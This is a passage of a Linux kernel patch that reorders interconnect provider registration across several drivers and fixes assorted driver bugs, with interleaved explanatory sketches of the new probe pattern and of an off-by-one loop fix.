++EXPORT_SYMBOL_GPL(icc_provider_deregister);
++
++int icc_provider_add(struct icc_provider *provider)
++{
++	icc_provider_init(provider);
++
++	return icc_provider_register(provider);
++}
++EXPORT_SYMBOL_GPL(icc_provider_add);
++
++void icc_provider_del(struct icc_provider *provider)
++{
++	WARN_ON(!list_empty(&provider->nodes));
++
++	icc_provider_deregister(provider);
++}
+ EXPORT_SYMBOL_GPL(icc_provider_del);
+ 
+ static int of_count_icc_providers(struct device_node *np)
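Every interconnect driver hunk that follows applies the same conversion:
initialize the provider, build and link the nodes, and only register the
provider once the topology is complete; removal deregisters before tearing the
nodes down. A minimal sketch of the resulting driver shape, assuming the
icc_provider_init()/icc_provider_register()/icc_provider_deregister() API
introduced above (the foo_* names and the FOO_ICC_MASTER node ID are
placeholders):

static int foo_icc_probe(struct platform_device *pdev)
{
	struct icc_provider *provider;
	struct icc_node *node;
	int ret;

	provider = devm_kzalloc(&pdev->dev, sizeof(*provider), GFP_KERNEL);
	if (!provider)
		return -ENOMEM;

	provider->dev = &pdev->dev;
	provider->set = foo_icc_set;		/* driver-specific bandwidth hook */
	provider->xlate = of_icc_xlate_onecell;

	icc_provider_init(provider);		/* step 1: not yet visible to consumers */

	node = icc_node_create(FOO_ICC_MASTER);	/* step 2: build the topology */
	if (IS_ERR(node))
		return PTR_ERR(node);
	icc_node_add(node, provider);

	ret = icc_provider_register(provider);	/* step 3: publish when complete */
	if (ret) {
		icc_nodes_remove(provider);
		return ret;
	}

	platform_set_drvdata(pdev, provider);
	return 0;
}

static int foo_icc_remove(struct platform_device *pdev)
{
	struct icc_provider *provider = platform_get_drvdata(pdev);

	icc_provider_deregister(provider);	/* unpublish first ... */
	icc_nodes_remove(provider);		/* ... then free the nodes */
	return 0;
}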
+diff --git a/drivers/interconnect/imx/imx.c b/drivers/interconnect/imx/imx.c
+index 823d9be9771a1..979ed610f704b 100644
+--- a/drivers/interconnect/imx/imx.c
++++ b/drivers/interconnect/imx/imx.c
+@@ -295,6 +295,9 @@ int imx_icc_register(struct platform_device *pdev,
+ 	provider->xlate = of_icc_xlate_onecell;
+ 	provider->data = data;
+ 	provider->dev = dev->parent;
++
++	icc_provider_init(provider);
++
+ 	platform_set_drvdata(pdev, imx_provider);
+ 
+ 	if (settings) {
+@@ -306,20 +309,18 @@ int imx_icc_register(struct platform_device *pdev,
+ 		}
+ 	}
+ 
+-	ret = icc_provider_add(provider);
+-	if (ret) {
+-		dev_err(dev, "error adding interconnect provider: %d\n", ret);
++	ret = imx_icc_register_nodes(imx_provider, nodes, nodes_count, settings);
++	if (ret)
+ 		return ret;
+-	}
+ 
+-	ret = imx_icc_register_nodes(imx_provider, nodes, nodes_count, settings);
++	ret = icc_provider_register(provider);
+ 	if (ret)
+-		goto provider_del;
++		goto err_unregister_nodes;
+ 
+ 	return 0;
+ 
+-provider_del:
+-	icc_provider_del(provider);
++err_unregister_nodes:
++	imx_icc_unregister_nodes(&imx_provider->provider);
+ 	return ret;
+ }
+ EXPORT_SYMBOL_GPL(imx_icc_register);
+@@ -328,9 +329,8 @@ void imx_icc_unregister(struct platform_device *pdev)
+ {
+ 	struct imx_icc_provider *imx_provider = platform_get_drvdata(pdev);
+ 
++	icc_provider_deregister(&imx_provider->provider);
+ 	imx_icc_unregister_nodes(&imx_provider->provider);
+-
+-	icc_provider_del(&imx_provider->provider);
+ }
+ EXPORT_SYMBOL_GPL(imx_icc_unregister);
+ 
+diff --git a/drivers/interconnect/qcom/icc-rpm.c b/drivers/interconnect/qcom/icc-rpm.c
+index df3196f725368..4180a06681b2b 100644
+--- a/drivers/interconnect/qcom/icc-rpm.c
++++ b/drivers/interconnect/qcom/icc-rpm.c
+@@ -503,7 +503,6 @@ regmap_done:
+ 	}
+ 
+ 	provider = &qp->provider;
+-	INIT_LIST_HEAD(&provider->nodes);
+ 	provider->dev = dev;
+ 	provider->set = qcom_icc_set;
+ 	provider->pre_aggregate = qcom_icc_pre_bw_aggregate;
+@@ -511,12 +510,7 @@ regmap_done:
+ 	provider->xlate_extended = qcom_icc_xlate_extended;
+ 	provider->data = data;
+ 
+-	ret = icc_provider_add(provider);
+-	if (ret) {
+-		dev_err(dev, "error adding interconnect provider: %d\n", ret);
+-		clk_bulk_disable_unprepare(qp->num_clks, qp->bus_clks);
+-		return ret;
+-	}
++	icc_provider_init(provider);
+ 
+ 	for (i = 0; i < num_nodes; i++) {
+ 		size_t j;
+@@ -524,7 +518,7 @@ regmap_done:
+ 		node = icc_node_create(qnodes[i]->id);
+ 		if (IS_ERR(node)) {
+ 			ret = PTR_ERR(node);
+-			goto err;
++			goto err_remove_nodes;
+ 		}
+ 
+ 		node->name = qnodes[i]->name;
+@@ -538,17 +532,26 @@ regmap_done:
+ 	}
+ 	data->num_nodes = num_nodes;
+ 
++	ret = icc_provider_register(provider);
++	if (ret)
++		goto err_remove_nodes;
++
+ 	platform_set_drvdata(pdev, qp);
+ 
+ 	/* Populate child NoC devices if any */
+-	if (of_get_child_count(dev->of_node) > 0)
+-		return of_platform_populate(dev->of_node, NULL, NULL, dev);
++	if (of_get_child_count(dev->of_node) > 0) {
++		ret = of_platform_populate(dev->of_node, NULL, NULL, dev);
++		if (ret)
++			goto err_deregister_provider;
++	}
+ 
+ 	return 0;
+-err:
++
++err_deregister_provider:
++	icc_provider_deregister(provider);
++err_remove_nodes:
+ 	icc_nodes_remove(provider);
+ 	clk_bulk_disable_unprepare(qp->num_clks, qp->bus_clks);
+-	icc_provider_del(provider);
+ 
+ 	return ret;
+ }
+@@ -558,9 +561,9 @@ int qnoc_remove(struct platform_device *pdev)
+ {
+ 	struct qcom_icc_provider *qp = platform_get_drvdata(pdev);
+ 
++	icc_provider_deregister(&qp->provider);
+ 	icc_nodes_remove(&qp->provider);
+ 	clk_bulk_disable_unprepare(qp->num_clks, qp->bus_clks);
+-	icc_provider_del(&qp->provider);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/interconnect/qcom/icc-rpmh.c b/drivers/interconnect/qcom/icc-rpmh.c
+index fd17291c61eb9..fdb5e58e408b4 100644
+--- a/drivers/interconnect/qcom/icc-rpmh.c
++++ b/drivers/interconnect/qcom/icc-rpmh.c
+@@ -192,9 +192,10 @@ int qcom_icc_rpmh_probe(struct platform_device *pdev)
+ 	provider->pre_aggregate = qcom_icc_pre_aggregate;
+ 	provider->aggregate = qcom_icc_aggregate;
+ 	provider->xlate_extended = qcom_icc_xlate_extended;
+-	INIT_LIST_HEAD(&provider->nodes);
+ 	provider->data = data;
+ 
++	icc_provider_init(provider);
++
+ 	qp->dev = dev;
+ 	qp->bcms = desc->bcms;
+ 	qp->num_bcms = desc->num_bcms;
+@@ -203,10 +204,6 @@ int qcom_icc_rpmh_probe(struct platform_device *pdev)
+ 	if (IS_ERR(qp->voter))
+ 		return PTR_ERR(qp->voter);
+ 
+-	ret = icc_provider_add(provider);
+-	if (ret)
+-		return ret;
+-
+ 	for (i = 0; i < qp->num_bcms; i++)
+ 		qcom_icc_bcm_init(qp->bcms[i], dev);
+ 
+@@ -218,7 +215,7 @@ int qcom_icc_rpmh_probe(struct platform_device *pdev)
+ 		node = icc_node_create(qn->id);
+ 		if (IS_ERR(node)) {
+ 			ret = PTR_ERR(node);
+-			goto err;
++			goto err_remove_nodes;
+ 		}
+ 
+ 		node->name = qn->name;
+@@ -232,16 +229,27 @@ int qcom_icc_rpmh_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	data->num_nodes = num_nodes;
++
++	ret = icc_provider_register(provider);
++	if (ret)
++		goto err_remove_nodes;
++
+ 	platform_set_drvdata(pdev, qp);
+ 
+ 	/* Populate child NoC devices if any */
+-	if (of_get_child_count(dev->of_node) > 0)
+-		return of_platform_populate(dev->of_node, NULL, NULL, dev);
++	if (of_get_child_count(dev->of_node) > 0) {
++		ret = of_platform_populate(dev->of_node, NULL, NULL, dev);
++		if (ret)
++			goto err_deregister_provider;
++	}
+ 
+ 	return 0;
+-err:
++
++err_deregister_provider:
++	icc_provider_deregister(provider);
++err_remove_nodes:
+ 	icc_nodes_remove(provider);
+-	icc_provider_del(provider);
++
+ 	return ret;
+ }
+ EXPORT_SYMBOL_GPL(qcom_icc_rpmh_probe);
+@@ -250,8 +258,8 @@ int qcom_icc_rpmh_remove(struct platform_device *pdev)
+ {
+ 	struct qcom_icc_provider *qp = platform_get_drvdata(pdev);
+ 
++	icc_provider_deregister(&qp->provider);
+ 	icc_nodes_remove(&qp->provider);
+-	icc_provider_del(&qp->provider);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/interconnect/qcom/msm8974.c b/drivers/interconnect/qcom/msm8974.c
+index 5ea192f1141dc..1828deaca4432 100644
+--- a/drivers/interconnect/qcom/msm8974.c
++++ b/drivers/interconnect/qcom/msm8974.c
+@@ -692,7 +692,6 @@ static int msm8974_icc_probe(struct platform_device *pdev)
+ 		return ret;
+ 
+ 	provider = &qp->provider;
+-	INIT_LIST_HEAD(&provider->nodes);
+ 	provider->dev = dev;
+ 	provider->set = msm8974_icc_set;
+ 	provider->aggregate = icc_std_aggregate;
+@@ -700,11 +699,7 @@ static int msm8974_icc_probe(struct platform_device *pdev)
+ 	provider->data = data;
+ 	provider->get_bw = msm8974_get_bw;
+ 
+-	ret = icc_provider_add(provider);
+-	if (ret) {
+-		dev_err(dev, "error adding interconnect provider: %d\n", ret);
+-		goto err_disable_clks;
+-	}
++	icc_provider_init(provider);
+ 
+ 	for (i = 0; i < num_nodes; i++) {
+ 		size_t j;
+@@ -712,7 +707,7 @@ static int msm8974_icc_probe(struct platform_device *pdev)
+ 		node = icc_node_create(qnodes[i]->id);
+ 		if (IS_ERR(node)) {
+ 			ret = PTR_ERR(node);
+-			goto err_del_icc;
++			goto err_remove_nodes;
+ 		}
+ 
+ 		node->name = qnodes[i]->name;
+@@ -729,15 +724,16 @@ static int msm8974_icc_probe(struct platform_device *pdev)
+ 	}
+ 	data->num_nodes = num_nodes;
+ 
++	ret = icc_provider_register(provider);
++	if (ret)
++		goto err_remove_nodes;
++
+ 	platform_set_drvdata(pdev, qp);
+ 
+ 	return 0;
+ 
+-err_del_icc:
++err_remove_nodes:
+ 	icc_nodes_remove(provider);
+-	icc_provider_del(provider);
+-
+-err_disable_clks:
+ 	clk_bulk_disable_unprepare(qp->num_clks, qp->bus_clks);
+ 
+ 	return ret;
+@@ -747,9 +743,9 @@ static int msm8974_icc_remove(struct platform_device *pdev)
+ {
+ 	struct msm8974_icc_provider *qp = platform_get_drvdata(pdev);
+ 
++	icc_provider_deregister(&qp->provider);
+ 	icc_nodes_remove(&qp->provider);
+ 	clk_bulk_disable_unprepare(qp->num_clks, qp->bus_clks);
+-	icc_provider_del(&qp->provider);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/interconnect/qcom/osm-l3.c b/drivers/interconnect/qcom/osm-l3.c
+index 5fa1710874258..3a1cbfe3e481f 100644
+--- a/drivers/interconnect/qcom/osm-l3.c
++++ b/drivers/interconnect/qcom/osm-l3.c
+@@ -158,8 +158,8 @@ static int qcom_osm_l3_remove(struct platform_device *pdev)
+ {
+ 	struct qcom_osm_l3_icc_provider *qp = platform_get_drvdata(pdev);
+ 
++	icc_provider_deregister(&qp->provider);
+ 	icc_nodes_remove(&qp->provider);
+-	icc_provider_del(&qp->provider);
+ 
+ 	return 0;
+ }
+@@ -245,14 +245,9 @@ static int qcom_osm_l3_probe(struct platform_device *pdev)
+ 	provider->set = qcom_osm_l3_set;
+ 	provider->aggregate = icc_std_aggregate;
+ 	provider->xlate = of_icc_xlate_onecell;
+-	INIT_LIST_HEAD(&provider->nodes);
+ 	provider->data = data;
+ 
+-	ret = icc_provider_add(provider);
+-	if (ret) {
+-		dev_err(&pdev->dev, "error adding interconnect provider\n");
+-		return ret;
+-	}
++	icc_provider_init(provider);
+ 
+ 	for (i = 0; i < num_nodes; i++) {
+ 		size_t j;
+@@ -275,12 +270,15 @@ static int qcom_osm_l3_probe(struct platform_device *pdev)
+ 	}
+ 	data->num_nodes = num_nodes;
+ 
++	ret = icc_provider_register(provider);
++	if (ret)
++		goto err;
++
+ 	platform_set_drvdata(pdev, qp);
+ 
+ 	return 0;
+ err:
+ 	icc_nodes_remove(provider);
+-	icc_provider_del(provider);
+ 
+ 	return ret;
+ }
+diff --git a/drivers/interconnect/samsung/exynos.c b/drivers/interconnect/samsung/exynos.c
+index 6559d8cf80687..72e42603823b9 100644
+--- a/drivers/interconnect/samsung/exynos.c
++++ b/drivers/interconnect/samsung/exynos.c
+@@ -98,12 +98,13 @@ static int exynos_generic_icc_remove(struct platform_device *pdev)
+ 	struct exynos_icc_priv *priv = platform_get_drvdata(pdev);
+ 	struct icc_node *parent_node, *node = priv->node;
+ 
++	icc_provider_deregister(&priv->provider);
++
+ 	parent_node = exynos_icc_get_parent(priv->dev->parent->of_node);
+ 	if (parent_node && !IS_ERR(parent_node))
+ 		icc_link_destroy(node, parent_node);
+ 
+ 	icc_nodes_remove(&priv->provider);
+-	icc_provider_del(&priv->provider);
+ 
+ 	return 0;
+ }
+@@ -132,15 +133,11 @@ static int exynos_generic_icc_probe(struct platform_device *pdev)
+ 	provider->inter_set = true;
+ 	provider->data = priv;
+ 
+-	ret = icc_provider_add(provider);
+-	if (ret < 0)
+-		return ret;
++	icc_provider_init(provider);
+ 
+ 	icc_node = icc_node_create(pdev->id);
+-	if (IS_ERR(icc_node)) {
+-		ret = PTR_ERR(icc_node);
+-		goto err_prov_del;
+-	}
++	if (IS_ERR(icc_node))
++		return PTR_ERR(icc_node);
+ 
+ 	priv->node = icc_node;
+ 	icc_node->name = devm_kasprintf(&pdev->dev, GFP_KERNEL, "%pOFn",
+@@ -149,6 +146,9 @@ static int exynos_generic_icc_probe(struct platform_device *pdev)
+ 				 &priv->bus_clk_ratio))
+ 		priv->bus_clk_ratio = EXYNOS_ICC_DEFAULT_BUS_CLK_RATIO;
+ 
++	icc_node->data = priv;
++	icc_node_add(icc_node, provider);
++
+ 	/*
+ 	 * Register a PM QoS request for the parent (devfreq) device.
+ 	 */
+@@ -157,9 +157,6 @@ static int exynos_generic_icc_probe(struct platform_device *pdev)
+ 	if (ret < 0)
+ 		goto err_node_del;
+ 
+-	icc_node->data = priv;
+-	icc_node_add(icc_node, provider);
+-
+ 	icc_parent_node = exynos_icc_get_parent(bus_dev->of_node);
+ 	if (IS_ERR(icc_parent_node)) {
+ 		ret = PTR_ERR(icc_parent_node);
+@@ -171,14 +168,17 @@ static int exynos_generic_icc_probe(struct platform_device *pdev)
+ 			goto err_pmqos_del;
+ 	}
+ 
++	ret = icc_provider_register(provider);
++	if (ret < 0)
++		goto err_pmqos_del;
++
+ 	return 0;
+ 
+ err_pmqos_del:
+ 	dev_pm_qos_remove_request(&priv->qos_req);
+ err_node_del:
+ 	icc_nodes_remove(provider);
+-err_prov_del:
+-	icc_provider_del(provider);
++
+ 	return ret;
+ }
+ 
+diff --git a/drivers/md/Kconfig b/drivers/md/Kconfig
+index 998a5cfdbc4e9..662d219c39bf4 100644
+--- a/drivers/md/Kconfig
++++ b/drivers/md/Kconfig
+@@ -16,6 +16,10 @@ if MD
+ config BLK_DEV_MD
+ 	tristate "RAID support"
+ 	select BLOCK_HOLDER_DEPRECATED if SYSFS
++	# BLOCK_LEGACY_AUTOLOAD requirement should be removed
++	# after relevant mdadm enhancements - to make "names=yes"
++	# the default - are widely available.
++	select BLOCK_LEGACY_AUTOLOAD
+ 	help
+ 	  This driver lets you combine several hard disk partitions into one
+ 	  logical block device. This can be used to simply append one
+diff --git a/drivers/md/dm.c b/drivers/md/dm.c
+index 605662935ce91..fdcf42554e2a9 100644
+--- a/drivers/md/dm.c
++++ b/drivers/md/dm.c
+@@ -510,10 +510,10 @@ static void dm_io_acct(struct dm_io *io, bool end)
+ 		sectors = io->sectors;
+ 
+ 	if (!end)
+-		bdev_start_io_acct(bio->bi_bdev, sectors, bio_op(bio),
+-				   start_time);
++		bdev_start_io_acct(bio->bi_bdev, bio_op(bio), start_time);
+ 	else
+-		bdev_end_io_acct(bio->bi_bdev, bio_op(bio), start_time);
++		bdev_end_io_acct(bio->bi_bdev, bio_op(bio), sectors,
++				 start_time);
+ 
+ 	if (static_branch_unlikely(&stats_enabled) &&
+ 	    unlikely(dm_stats_used(&md->stats))) {
+diff --git a/drivers/media/i2c/m5mols/m5mols_core.c b/drivers/media/i2c/m5mols/m5mols_core.c
+index 2b01873ba0db5..5c2336f318d9a 100644
+--- a/drivers/media/i2c/m5mols/m5mols_core.c
++++ b/drivers/media/i2c/m5mols/m5mols_core.c
+@@ -488,7 +488,7 @@ static enum m5mols_restype __find_restype(u32 code)
+ 	do {
+ 		if (code == m5mols_default_ffmt[type].code)
+ 			return type;
+-	} while (type++ != SIZE_DEFAULT_FFMT);
++	} while (++type != SIZE_DEFAULT_FFMT);
+ 
+ 	return 0;
+ }
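The m5mols one-liner above closes an off-by-one: with the post-increment, the
loop body evaluates m5mols_default_ffmt[type] for type == SIZE_DEFAULT_FFMT,
one entry past the end of the array, before the exit test fires. A standalone
illustration of the two loop shapes (the bound N and the printouts are
hypothetical; only the increment placement mirrors the driver):

#include <stdio.h>

#define N 2	/* stands in for SIZE_DEFAULT_FFMT */

int main(void)
{
	int i;

	/* old form: visits 0, 1, then 2 (one past the end), because the
	 * comparison happens before the increment
	 */
	i = 0;
	do
		printf("old form visits index %d\n", i);
	while (i++ != N);

	/* fixed form: visits 0 and 1, then stops */
	i = 0;
	do
		printf("fixed form visits index %d\n", i);
	while (++i != N);

	return 0;
}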
+diff --git a/drivers/memory/tegra/mc.c b/drivers/memory/tegra/mc.c
+index 592907546ee64..5cd28619ea9fb 100644
+--- a/drivers/memory/tegra/mc.c
++++ b/drivers/memory/tegra/mc.c
+@@ -794,16 +794,12 @@ static int tegra_mc_interconnect_setup(struct tegra_mc *mc)
+ 	mc->provider.aggregate = mc->soc->icc_ops->aggregate;
+ 	mc->provider.xlate_extended = mc->soc->icc_ops->xlate_extended;
+ 
+-	err = icc_provider_add(&mc->provider);
+-	if (err)
+-		return err;
++	icc_provider_init(&mc->provider);
+ 
+ 	/* create Memory Controller node */
+ 	node = icc_node_create(TEGRA_ICC_MC);
+-	if (IS_ERR(node)) {
+-		err = PTR_ERR(node);
+-		goto del_provider;
+-	}
++	if (IS_ERR(node))
++		return PTR_ERR(node);
+ 
+ 	node->name = "Memory Controller";
+ 	icc_node_add(node, &mc->provider);
+@@ -830,12 +826,14 @@ static int tegra_mc_interconnect_setup(struct tegra_mc *mc)
+ 			goto remove_nodes;
+ 	}
+ 
++	err = icc_provider_register(&mc->provider);
++	if (err)
++		goto remove_nodes;
++
+ 	return 0;
+ 
+ remove_nodes:
+ 	icc_nodes_remove(&mc->provider);
+-del_provider:
+-	icc_provider_del(&mc->provider);
+ 
+ 	return err;
+ }
+diff --git a/drivers/memory/tegra/tegra124-emc.c b/drivers/memory/tegra/tegra124-emc.c
+index 85bc936c02f94..00ed2b6a0d1b2 100644
+--- a/drivers/memory/tegra/tegra124-emc.c
++++ b/drivers/memory/tegra/tegra124-emc.c
+@@ -1351,15 +1351,13 @@ static int tegra_emc_interconnect_init(struct tegra_emc *emc)
+ 	emc->provider.aggregate = soc->icc_ops->aggregate;
+ 	emc->provider.xlate_extended = emc_of_icc_xlate_extended;
+ 
+-	err = icc_provider_add(&emc->provider);
+-	if (err)
+-		goto err_msg;
++	icc_provider_init(&emc->provider);
+ 
+ 	/* create External Memory Controller node */
+ 	node = icc_node_create(TEGRA_ICC_EMC);
+ 	if (IS_ERR(node)) {
+ 		err = PTR_ERR(node);
+-		goto del_provider;
++		goto err_msg;
+ 	}
+ 
+ 	node->name = "External Memory Controller";
+@@ -1380,12 +1378,14 @@ static int tegra_emc_interconnect_init(struct tegra_emc *emc)
+ 	node->name = "External Memory (DRAM)";
+ 	icc_node_add(node, &emc->provider);
+ 
++	err = icc_provider_register(&emc->provider);
++	if (err)
++		goto remove_nodes;
++
+ 	return 0;
+ 
+ remove_nodes:
+ 	icc_nodes_remove(&emc->provider);
+-del_provider:
+-	icc_provider_del(&emc->provider);
+ err_msg:
+ 	dev_err(emc->dev, "failed to initialize ICC: %d\n", err);
+ 
+diff --git a/drivers/memory/tegra/tegra20-emc.c b/drivers/memory/tegra/tegra20-emc.c
+index bd4e37b6552de..fd595c851a278 100644
+--- a/drivers/memory/tegra/tegra20-emc.c
++++ b/drivers/memory/tegra/tegra20-emc.c
+@@ -1021,15 +1021,13 @@ static int tegra_emc_interconnect_init(struct tegra_emc *emc)
+ 	emc->provider.aggregate = soc->icc_ops->aggregate;
+ 	emc->provider.xlate_extended = emc_of_icc_xlate_extended;
+ 
+-	err = icc_provider_add(&emc->provider);
+-	if (err)
+-		goto err_msg;
++	icc_provider_init(&emc->provider);
+ 
+ 	/* create External Memory Controller node */
+ 	node = icc_node_create(TEGRA_ICC_EMC);
+ 	if (IS_ERR(node)) {
+ 		err = PTR_ERR(node);
+-		goto del_provider;
++		goto err_msg;
+ 	}
+ 
+ 	node->name = "External Memory Controller";
+@@ -1050,12 +1048,14 @@ static int tegra_emc_interconnect_init(struct tegra_emc *emc)
+ 	node->name = "External Memory (DRAM)";
+ 	icc_node_add(node, &emc->provider);
+ 
++	err = icc_provider_register(&emc->provider);
++	if (err)
++		goto remove_nodes;
++
+ 	return 0;
+ 
+ remove_nodes:
+ 	icc_nodes_remove(&emc->provider);
+-del_provider:
+-	icc_provider_del(&emc->provider);
+ err_msg:
+ 	dev_err(emc->dev, "failed to initialize ICC: %d\n", err);
+ 
+diff --git a/drivers/memory/tegra/tegra30-emc.c b/drivers/memory/tegra/tegra30-emc.c
+index 77706e9bc5433..c91e9b7e2e019 100644
+--- a/drivers/memory/tegra/tegra30-emc.c
++++ b/drivers/memory/tegra/tegra30-emc.c
+@@ -1533,15 +1533,13 @@ static int tegra_emc_interconnect_init(struct tegra_emc *emc)
+ 	emc->provider.aggregate = soc->icc_ops->aggregate;
+ 	emc->provider.xlate_extended = emc_of_icc_xlate_extended;
+ 
+-	err = icc_provider_add(&emc->provider);
+-	if (err)
+-		goto err_msg;
++	icc_provider_init(&emc->provider);
+ 
+ 	/* create External Memory Controller node */
+ 	node = icc_node_create(TEGRA_ICC_EMC);
+ 	if (IS_ERR(node)) {
+ 		err = PTR_ERR(node);
+-		goto del_provider;
++		goto err_msg;
+ 	}
+ 
+ 	node->name = "External Memory Controller";
+@@ -1562,12 +1560,14 @@ static int tegra_emc_interconnect_init(struct tegra_emc *emc)
+ 	node->name = "External Memory (DRAM)";
+ 	icc_node_add(node, &emc->provider);
+ 
++	err = icc_provider_register(&emc->provider);
++	if (err)
++		goto remove_nodes;
++
+ 	return 0;
+ 
+ remove_nodes:
+ 	icc_nodes_remove(&emc->provider);
+-del_provider:
+-	icc_provider_del(&emc->provider);
+ err_msg:
+ 	dev_err(emc->dev, "failed to initialize ICC: %d\n", err);
+ 
+diff --git a/drivers/mmc/host/sdhci_am654.c b/drivers/mmc/host/sdhci_am654.c
+index 7ef828942df35..89953093e20c7 100644
+--- a/drivers/mmc/host/sdhci_am654.c
++++ b/drivers/mmc/host/sdhci_am654.c
+@@ -369,7 +369,7 @@ static void sdhci_am654_write_b(struct sdhci_host *host, u8 val, int reg)
+ 					MAX_POWER_ON_TIMEOUT, false, host, val,
+ 					reg);
+ 		if (ret)
+-			dev_warn(mmc_dev(host->mmc), "Power on failed\n");
++			dev_info(mmc_dev(host->mmc), "Power on failed\n");
+ 	}
+ }
+ 
+diff --git a/drivers/net/bonding/bond_main.c b/drivers/net/bonding/bond_main.c
+index 0363ce5976614..116d295df0b55 100644
+--- a/drivers/net/bonding/bond_main.c
++++ b/drivers/net/bonding/bond_main.c
+@@ -1773,6 +1773,19 @@ void bond_lower_state_changed(struct slave *slave)
+ 		slave_err(bond_dev, slave_dev, "Error: %s\n", errmsg);	\
+ } while (0)
+ 
++/* The bonding driver uses ether_setup() to convert a master bond device
++ * to ARPHRD_ETHER, which resets the target netdevice's flags so we always
++ * have to restore the IFF_MASTER flag, and only restore IFF_SLAVE if it was set
++ */
++static void bond_ether_setup(struct net_device *bond_dev)
++{
++	unsigned int slave_flag = bond_dev->flags & IFF_SLAVE;
++
++	ether_setup(bond_dev);
++	bond_dev->flags |= IFF_MASTER | slave_flag;
++	bond_dev->priv_flags &= ~IFF_TX_SKB_SHARING;
++}
++
+ /* enslave device <slave> to bond device <master> */
+ int bond_enslave(struct net_device *bond_dev, struct net_device *slave_dev,
+ 		 struct netlink_ext_ack *extack)
+@@ -1864,10 +1877,8 @@ int bond_enslave(struct net_device *bond_dev, struct net_device *slave_dev,
+ 
+ 			if (slave_dev->type != ARPHRD_ETHER)
+ 				bond_setup_by_slave(bond_dev, slave_dev);
+-			else {
+-				ether_setup(bond_dev);
+-				bond_dev->priv_flags &= ~IFF_TX_SKB_SHARING;
+-			}
++			else
++				bond_ether_setup(bond_dev);
+ 
+ 			call_netdevice_notifiers(NETDEV_POST_TYPE_CHANGE,
+ 						 bond_dev);
+@@ -2287,9 +2298,7 @@ err_undo_flags:
+ 			eth_hw_addr_random(bond_dev);
+ 		if (bond_dev->type != ARPHRD_ETHER) {
+ 			dev_close(bond_dev);
+-			ether_setup(bond_dev);
+-			bond_dev->flags |= IFF_MASTER;
+-			bond_dev->priv_flags &= ~IFF_TX_SKB_SHARING;
++			bond_ether_setup(bond_dev);
+ 		}
+ 	}
+ 
+diff --git a/drivers/net/dsa/microchip/ksz_common.c b/drivers/net/dsa/microchip/ksz_common.c
+index 9b20c2ee6d62a..19cd05762ab77 100644
+--- a/drivers/net/dsa/microchip/ksz_common.c
++++ b/drivers/net/dsa/microchip/ksz_common.c
+@@ -310,7 +310,7 @@ static const u16 ksz8795_regs[] = {
+ 	[S_BROADCAST_CTRL]		= 0x06,
+ 	[S_MULTICAST_CTRL]		= 0x04,
+ 	[P_XMII_CTRL_0]			= 0x06,
+-	[P_XMII_CTRL_1]			= 0x56,
++	[P_XMII_CTRL_1]			= 0x06,
+ };
+ 
+ static const u32 ksz8795_masks[] = {
+diff --git a/drivers/net/dsa/mt7530.c b/drivers/net/dsa/mt7530.c
+index 003672d71a3bf..178e5a3441e68 100644
+--- a/drivers/net/dsa/mt7530.c
++++ b/drivers/net/dsa/mt7530.c
+@@ -430,8 +430,6 @@ mt7530_pad_clk_setup(struct dsa_switch *ds, phy_interface_t interface)
+ 	switch (interface) {
+ 	case PHY_INTERFACE_MODE_RGMII:
+ 		trgint = 0;
+-		/* PLL frequency: 125MHz */
+-		ncpo1 = 0x0c80;
+ 		break;
+ 	case PHY_INTERFACE_MODE_TRGMII:
+ 		trgint = 1;
+@@ -462,38 +460,40 @@ mt7530_pad_clk_setup(struct dsa_switch *ds, phy_interface_t interface)
+ 	mt7530_rmw(priv, MT7530_P6ECR, P6_INTF_MODE_MASK,
+ 		   P6_INTF_MODE(trgint));
+ 
+-	/* Lower Tx Driving for TRGMII path */
+-	for (i = 0 ; i < NUM_TRGMII_CTRL ; i++)
+-		mt7530_write(priv, MT7530_TRGMII_TD_ODT(i),
+-			     TD_DM_DRVP(8) | TD_DM_DRVN(8));
+-
+-	/* Disable MT7530 core and TRGMII Tx clocks */
+-	core_clear(priv, CORE_TRGMII_GSW_CLK_CG,
+-		   REG_GSWCK_EN | REG_TRGMIICK_EN);
+-
+-	/* Setup the MT7530 TRGMII Tx Clock */
+-	core_write(priv, CORE_PLL_GROUP5, RG_LCDDS_PCW_NCPO1(ncpo1));
+-	core_write(priv, CORE_PLL_GROUP6, RG_LCDDS_PCW_NCPO0(0));
+-	core_write(priv, CORE_PLL_GROUP10, RG_LCDDS_SSC_DELTA(ssc_delta));
+-	core_write(priv, CORE_PLL_GROUP11, RG_LCDDS_SSC_DELTA1(ssc_delta));
+-	core_write(priv, CORE_PLL_GROUP4,
+-		   RG_SYSPLL_DDSFBK_EN | RG_SYSPLL_BIAS_EN |
+-		   RG_SYSPLL_BIAS_LPF_EN);
+-	core_write(priv, CORE_PLL_GROUP2,
+-		   RG_SYSPLL_EN_NORMAL | RG_SYSPLL_VODEN |
+-		   RG_SYSPLL_POSDIV(1));
+-	core_write(priv, CORE_PLL_GROUP7,
+-		   RG_LCDDS_PCW_NCPO_CHG | RG_LCCDS_C(3) |
+-		   RG_LCDDS_PWDB | RG_LCDDS_ISO_EN);
+-
+-	/* Enable MT7530 core and TRGMII Tx clocks */
+-	core_set(priv, CORE_TRGMII_GSW_CLK_CG,
+-		 REG_GSWCK_EN | REG_TRGMIICK_EN);
+-
+-	if (!trgint)
++	if (trgint) {
++		/* Lower Tx Driving for TRGMII path */
++		for (i = 0 ; i < NUM_TRGMII_CTRL ; i++)
++			mt7530_write(priv, MT7530_TRGMII_TD_ODT(i),
++				     TD_DM_DRVP(8) | TD_DM_DRVN(8));
++
++		/* Disable MT7530 core and TRGMII Tx clocks */
++		core_clear(priv, CORE_TRGMII_GSW_CLK_CG,
++			   REG_GSWCK_EN | REG_TRGMIICK_EN);
++
++		/* Setup the MT7530 TRGMII Tx Clock */
++		core_write(priv, CORE_PLL_GROUP5, RG_LCDDS_PCW_NCPO1(ncpo1));
++		core_write(priv, CORE_PLL_GROUP6, RG_LCDDS_PCW_NCPO0(0));
++		core_write(priv, CORE_PLL_GROUP10, RG_LCDDS_SSC_DELTA(ssc_delta));
++		core_write(priv, CORE_PLL_GROUP11, RG_LCDDS_SSC_DELTA1(ssc_delta));
++		core_write(priv, CORE_PLL_GROUP4,
++			   RG_SYSPLL_DDSFBK_EN | RG_SYSPLL_BIAS_EN |
++			   RG_SYSPLL_BIAS_LPF_EN);
++		core_write(priv, CORE_PLL_GROUP2,
++			   RG_SYSPLL_EN_NORMAL | RG_SYSPLL_VODEN |
